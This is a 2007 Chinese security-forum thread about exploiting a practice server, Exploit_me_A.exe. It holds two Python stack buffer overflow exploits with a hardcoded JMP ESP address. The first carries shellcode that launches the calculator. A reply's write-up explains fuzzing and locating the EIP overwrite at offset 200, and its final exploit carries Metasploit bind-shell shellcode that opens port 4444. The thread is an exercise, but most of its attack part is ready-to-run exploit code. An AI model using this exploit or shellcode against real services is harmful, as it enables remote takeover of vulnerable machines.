首页
社区
课程
招聘
[原创]exploit_me_A exploit
发表于: 2007-12-29 19:49 17993

[原创]exploit_me_A exploit

2007-12-29 19:49
17993
#!/usr/bin/env python

import socket

host = "127.0.0.1"
port = 7777
JMPESP = "\x12\x45\xFA\x7F"
#执行计算器
shellcode="\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
shellcode+="\x58\x6c\xa3\x83\xeb\xfc\xe2\xf4\x8d\xb0\x28\xa3\x71\x58\xe7\xe6"
shellcode+="\x4d\xd3\x10\xa6\x09\x59\x83\x28\x3e\x40\xe7\xfc\x51\x59\x87\xea"
shellcode+="\xfa\x6c\xe7\xa2\x9f\x69\xac\x3a\xdd\xdc\xac\xd7\x76\x99\xa6\xae"
shellcode+="\x70\x9a\x87\x57\x4a\x0c\x48\xa7\x04\xbd\xe7\xfc\x55\x59\x87\xc5"
shellcode+="\xfa\x54\x27\x28\x2e\x44\x6d\x48\xfa\x44\xe7\xa2\x9a\xd1\x30\x87"
shellcode+="\x75\x9b\x5d\x63\x15\xd3\x2c\x93\xf4\x98\x14\xaf\xfa\x18\x60\x28"
shellcode+="\x01\x44\xc1\x28\x19\x50\x87\xaa\xfa\xd8\xdc\xa3\x71\x58\xe7\xcb"
shellcode+="\x4d\x07\x5d\x55\x11\x0e\xe5\x5b\xf2\x98\x17\xf3\x19\x26\xb4\x41"
shellcode+="\x02\x30\xf4\x5d\xfb\x56\x3b\x5c\x96\x3b\x0d\xcf\x12\x58\x6c\xa3";

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print shellcode
print "
  • Connecting to [%s:%d]" % (host, port)
  • s.connect((host, port))

    buffer = "A" * 200 +JMPESP+"\x90"*8+shellcode

    print "
  • Sending [%s]" % buffer
  • s.send(buffer)

    print "
  • Closing socket"
  • s.close()

    [培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

    收藏
    免费 0
    支持
    分享
    最新回复 (5)
    雪    币: 220
    活跃值: (35)
    能力值: ( LV2,RANK:10 )
    在线值:
    发帖
    回帖
    粉丝
    2
    Exploit_me_A.exe 分析报告
    提交者看雪ID:hahar
    职业:(学生、程序员、安全专家、黑客技术爱好者、其他?)
    学生

    1.        PE分析
    拿到程序,从介绍中知道是个服务器程序,直接运行,然后使用Process Explorer查看Exploit_me_A.exe监听的端口,如图1所示:

    知道程序监听7777端口,接着使用python脚本发送一串A过去,看看服务器反应:
    #!/usr/bin/env python

    import socket

    host = "127.0.0.1"
    port = 7777

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #print shellcode
    print "
  • Connecting to [%s:%d]" % (host, port)
  • s.connect((host, port))

    buffer = "A" * 10
    print "
  • Sending [%s]" % buffer
  • s.send(buffer)

    print "
  • Closing socket"
  • s.close()

    服务器返回了输入的数据,初步断定是个echo的程序,输入什么就返回什么。
    2.        漏洞描述
    输入10个A的时候程序没有溢出,逐步加大A的数量,当A到1000时,
    cdb调试器报告异常(ps:使用cdb包含在windwos debug tools 工具包中,使用cdb –iae可以设置cdb为异常处理的调试器)

    由此可以看到服务器程序在处理用户输入的数据时存在异常,导致溢出,从调试器上看正在执行41414141,显然是我们输入的A,下一步要精确定为溢出点,这里可以采用二分法(逐步用500,250,125长度去测试)或者百、十、个位定位法定位。这里采用第二种方法。
    修改python程序
    buffer = "”
    li = ["A","B","C","D","E","F","G","H","I","J"]
    for ch in li:
            buffer += ch *100

    从结果看到是字符”C”覆盖了EIP,由此确定溢出长度在200~300之间,继续定位十位
    buffer = "a"*200
    li = ["A","B","C","D","E","F","G","H","I","J"]
    for ch in li:
            buffer += ch *10

    从调试器看到字符A覆盖了EIP,于是确定覆盖长度在200~210,同理定位个位
    buffer = "a"*200
    li = ["A","B","C","D","E","F","G","H","I","J"]
    for ch in li:
            buffer += ch *1

    从结果看,从201~204覆盖了EIP。下面就可以构造exploit了。
    Buffer = A*200+JMPESP+NOP*20+Shellcode
    这里可以看到NOP我用了20,其实只要大于函数返回是减去的个数就可以了,NOP指令不影响shellocde执行。JMPESP采用中文平台下通用的JMPESP = "\x12\x45\xFA\x7F"
    3.shellcode功能
    我是个懒人,直接从http://metasploit.com:55555/PAYLOADS?FILTER=win32站点上进行定制
    选择windows bind shell,产生一个监听4444端口的shellcode

    4.稳定性与通用性
    由于程序中的JMPESP地址适用所有的中文操作系统,shellcode也是动态定位API地址,具有很好的稳定性与通用性。
    4.exploit运行成功截图

    可以看到4444端口正在监听。
    5.exploit
    #!/usr/bin/env python

    import socket

    host = "127.0.0.1"
    port = 7777
    JMPESP = "\x12\x45\xFA\x7F"
    #监听4444端口
    shellcode="\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe"
    shellcode+="\x6b\xb2\x91\x83\xeb\xfc\xe2\xf4\x42\x01\x59\xdc\x56\x92\x4d\x6e"
    shellcode+="\x41\x0b\x39\xfd\x9a\x4f\x39\xd4\x82\xe0\xce\x94\xc6\x6a\x5d\x1a"
    shellcode+="\xf1\x73\x39\xce\x9e\x6a\x59\xd8\x35\x5f\x39\x90\x50\x5a\x72\x08"
    shellcode+="\x12\xef\x72\xe5\xb9\xaa\x78\x9c\xbf\xa9\x59\x65\x85\x3f\x96\xb9"
    shellcode+="\xcb\x8e\x39\xce\x9a\x6a\x59\xf7\x35\x67\xf9\x1a\xe1\x77\xb3\x7a"
    shellcode+="\xbd\x47\x39\x18\xd2\x4f\xae\xf0\x7d\x5a\x69\xf5\x35\x28\x82\x1a"
    shellcode+="\xfe\x67\x39\xe1\xa2\xc6\x39\xd1\xb6\x35\xda\x1f\xf0\x65\x5e\xc1"
    shellcode+="\x41\xbd\xd4\xc2\xd8\x03\x81\xa3\xd6\x1c\xc1\xa3\xe1\x3f\x4d\x41"
    shellcode+="\xd6\xa0\x5f\x6d\x85\x3b\x4d\x47\xe1\xe2\x57\xf7\x3f\x86\xba\x93"
    shellcode+="\xeb\x01\xb0\x6e\x6e\x03\x6b\x98\x4b\xc6\xe5\x6e\x68\x38\xe1\xc2"
    shellcode+="\xed\x38\xf1\xc2\xfd\x38\x4d\x41\xd8\x03\xa3\xcd\xd8\x38\x3b\x70"
    shellcode+="\x2b\x03\x16\x8b\xce\xac\xe5\x6e\x68\x01\xa2\xc0\xeb\x94\x62\xf9"
    shellcode+="\x1a\xc6\x9c\x78\xe9\x94\x64\xc2\xeb\x94\x62\xf9\x5b\x22\x34\xd8"
    shellcode+="\xe9\x94\x64\xc1\xea\x3f\xe7\x6e\x6e\xf8\xda\x76\xc7\xad\xcb\xc6"
    shellcode+="\x41\xbd\xe7\x6e\x6e\x0d\xd8\xf5\xd8\x03\xd1\xfc\x37\x8e\xd8\xc1"
    shellcode+="\xe7\x42\x7e\x18\x59\x01\xf6\x18\x5c\x5a\x72\x62\x14\x95\xf0\xbc"
    shellcode+="\x40\x29\x9e\x02\x33\x11\x8a\x3a\x15\xc0\xda\xe3\x40\xd8\xa4\x6e"
    shellcode+="\xcb\x2f\x4d\x47\xe5\x3c\xe0\xc0\xef\x3a\xd8\x90\xef\x3a\xe7\xc0"
    shellcode+="\x41\xbb\xda\x3c\x67\x6e\x7c\xc2\x41\xbd\xd8\x6e\x41\x5c\x4d\x41"
    shellcode+="\x35\x3c\x4e\x12\x7a\x0f\x4d\x47\xec\x94\x62\xf9\x4e\xe1\xb6\xce"
    shellcode+="\xed\x94\x64\x6e\x6e\x6b\xb2\x91"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #print shellcode
    print "
  • Connecting to [%s:%d]" % (host, port)
  • s.connect((host, port))
    #buffer = "a"*200
    #li = ["A","B","C","D","E","F","G","H","I","J"]
    #for ch in li:
    #        buffer += ch *1
    #print buffer
    buffer = "A" * 200 +JMPESP+"\x90"*20+shellcode
    #buffer = "A" * 1000
    print "
  • Sending [%s]" % buffer
  • s.send(buffer)

    print "
  • Closing socket"
  • s.close()
    2007-12-29 20:48
    0
    雪    币: 220
    活跃值: (35)
    能力值: ( LV2,RANK:10 )
    在线值:
    发帖
    回帖
    粉丝
    3
    无上传附件功能,图片和word文档无法提交
    2007-12-29 20:54
    0
    雪    币: 50161
    活跃值: (20605)
    能力值: (RANK:350 )
    在线值:
    发帖
    回帖
    粉丝
    4
    点击回复主题,再单击管理附件,就可上传附件了。

    如果插图,参考这帖:
    http://bbs.pediy.com/showpost.php?postid=292659
    2007-12-29 21:00
    0
    雪    币: 220
    活跃值: (35)
    能力值: ( LV2,RANK:10 )
    在线值:
    发帖
    回帖
    粉丝
    5
    谢谢,已上传!
    上传的附件:
    2007-12-29 21:12
    0
    雪    币: 100
    活跃值: (10)
    能力值: ( LV2,RANK:10 )
    在线值:
    发帖
    回帖
    粉丝
    6
    support it.
    2010-2-3 19:33
    0
    游客
    登录 | 注册 方可回帖
    返回
    //